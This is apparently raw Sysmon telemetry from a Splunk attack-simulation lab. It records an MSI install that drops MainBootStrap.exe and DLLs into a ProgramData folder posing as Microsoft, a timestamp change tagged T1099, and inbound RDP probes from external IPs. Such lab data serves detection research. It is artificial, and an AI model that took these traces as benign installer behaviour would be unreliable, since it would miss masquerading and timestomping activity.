CorporationRUNDLL32.EXErundll32.exe "C:\Windows\Installer\MSIB3E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_13808859 26619 SetupConfigCustomAction!Squirrel.SetupConfigCustomAction.SettingsCustomActions.CopyConfigC:\Windows\SysWOW64\ATTACKRANGE\Administrator{A7A01FEF-C0A5-607E-58C6-320000000000}0x32c6582HighMD5=A6ED2B5513A128315EC73A300D215759,SHA256=9980CC59993DCDE34A20411E3FACFEE8E7B159EE0D6FA510BCFAECC8532B4C02,IMPHASH=B79A26282DC6494FFDA9173E830DAB0A{A7A01FEF-EC0E-607E-390E-00000000BB01}5076C:\Windows\SysWOW64\msiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FC8FF24FD8BD22E0CF52679A365E5F2A 17141700x800000000000000079383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-CreatePipe2021-04-20 14:58:23.060{A7A01FEF-EC0E-607E-390E-00000000BB01}5076\SfxCA_13808859C:\Windows\syswow64\MsiExec.exe 10341000x800000000000000079382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.029{A7A01FEF-EC0E-607E-390E-00000000BB01}50766116C:\Windows\syswow64\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\syswow64\MsiExec.exe+7291|C:\Windows\syswow64\MsiExec.exe+7873|C:\Windows\syswow64\MsiExec.exe+9201|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000050527Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:21.415{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61854-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050526Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:20.975{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53006-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050525Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:23.790{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050524Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:23.775{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C0DC5C0E83769D9BA99757D6EFBED0,SHA256=F97A732672B811068C8F568638EBDF20956C428EE649B74336FA530022EAA04D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000079436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:23.019{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18577-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:22.843{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-21301-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000079434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.279{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EC0F-607E-3B0E-00000000BB01}4460C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000079433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.060{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFFEF7C6F05FA01BC5.TMPMD5=237037920B35BB0110FF296AC018C00D,SHA256=99637D81936DDD39B097DC1B7389D4E52492BD867966EB08BD4EECA268A52E29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.060{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFC1858A7E8144B9C7.TMPMD5=59EBC1A4F0B6C703D34E481AAA241144,SHA256=91AD6015AA82E287834E8D8EF1B398BD89E883861885A88639D9B08A013D9602,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.029{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIB3E8.tmpMD5=915C007381385DDEB22A0FF66AA47FAE,SHA256=F12A80A4B3EB7789B005328C25316B1C7995EFA8CD14F00EA55EE7412A3BBF09,IMPHASH=C2AAC1B2B9FA36FBEA7CD3D2B4516228truetrue 354300x800000000000000050530Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:22.266{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com56929-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050529Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:24.790{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=806B72EAAECC818EEEC336EA07AE0161,SHA256=3FAFF213C8C94AD231F8860C89A5867596AE3A219B477BF714964DD640022EE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050528Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:24.056{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7627F8C89D88E3BF73F6E9029F135100,SHA256=5902873DD7CB56012AAB66166743ED8CF214AD4844749867D873FFAB9C91C4DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.951{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF2F8DC0FB4662382BE70315F763259B,SHA256=675D7017F77154FC9451394484B82EC81EE4DCA8B27B0534B493CAF89EA2E77D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.873{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC11-607E-3E0E-00000000BB01}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.857{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC11-607E-3E0E-00000000BB01}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.857{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC11-607E-3E0E-00000000BB01}4196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000079482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.619{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-19939-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.377{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-22663-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000079480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.249{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57559-false10.0.1.12-8000- 354300x800000000000000079479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:24.154{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55052-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000079478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.638{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=43EC00526BFF509F45C91FD021A376CB,SHA256=BF813D0017D4BD89A864E736A366E5E8CB6B2F491AAB27E0640AC3A51214A7DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.513{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.482{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.482{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.482{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.482{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.482{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.482{A7A01FEF-EB7F-607E-9C0B-00000000BB01}14006732C:\Windows\system32\msiexec.exe{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\Msi.dll+ebf92|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000079470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.491{A7A01FEF-EC11-607E-3D0E-00000000BB01}5260C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe1.0.0.0MainBootStrapMainBootStrap-MainBootStrap.exe"C:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe" installC:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e72SystemMD5=9D9997F062E05C4A830A14A0D43B508A,SHA256=A12EE9BF211B59A17C9BAFA0336BAE7362F27665DBB0E00741E672985F444A26,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 13241300x800000000000000079469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D066B018-448B-40C5-9034-259BBCC49351}\URLUpdateInfo(Empty) 13241300x800000000000000079468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D066B018-448B-40C5-9034-259BBCC49351}\PublisherMicrosoft 13241300x800000000000000079467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{D066B018-448B-40C5-9034-259BBCC49351}\InstallSourceC:\Program Files\Microsoft Office\root\integration\Addons\ 11241100x800000000000000079466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\System.Security.Cryptography.X509Certificates.dll2021-04-20 14:58:25.466 11241100x800000000000000079465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\System.Security.Cryptography.Primitives.dll2021-04-20 14:58:25.466 11241100x800000000000000079464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\System.Security.Cryptography.Encoding.dll2021-04-20 14:58:25.466 11241100x800000000000000079463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\System.Security.Cryptography.Algorithms.dll2021-04-20 14:58:25.466 10341000x800000000000000079462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.466{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EC11-607E-3C0E-00000000BB01}1572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000079461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.466{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\System.Net.Http.dll2021-04-20 14:58:25.466 11241100x800000000000000079460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.451{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\Services.dll2021-04-20 14:58:25.451 11241100x800000000000000079459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.451{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\NLog.dll2021-04-20 14:58:25.451 11241100x800000000000000079458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.451{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\Newtonsoft.Json.dll2021-04-20 14:58:25.435 11241100x800000000000000079457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.435{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\Models.dll2021-04-20 14:58:25.435 11241100x800000000000000079456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:25.435{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\Managers.dll2021-04-20 14:58:25.435 254200x800000000000000079455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10992021-04-20 14:58:25.435{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe2020-04-20 20:07:58.0002021-04-20 14:58:25.435 11241100x800000000000000079454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:25.435{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exeC:\ProgramData\Microsoft\DefaultPackMSI\MainBootStrap.exe2021-04-20 14:58:25.435 23542300x800000000000000079453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:25.419{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d082a0.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 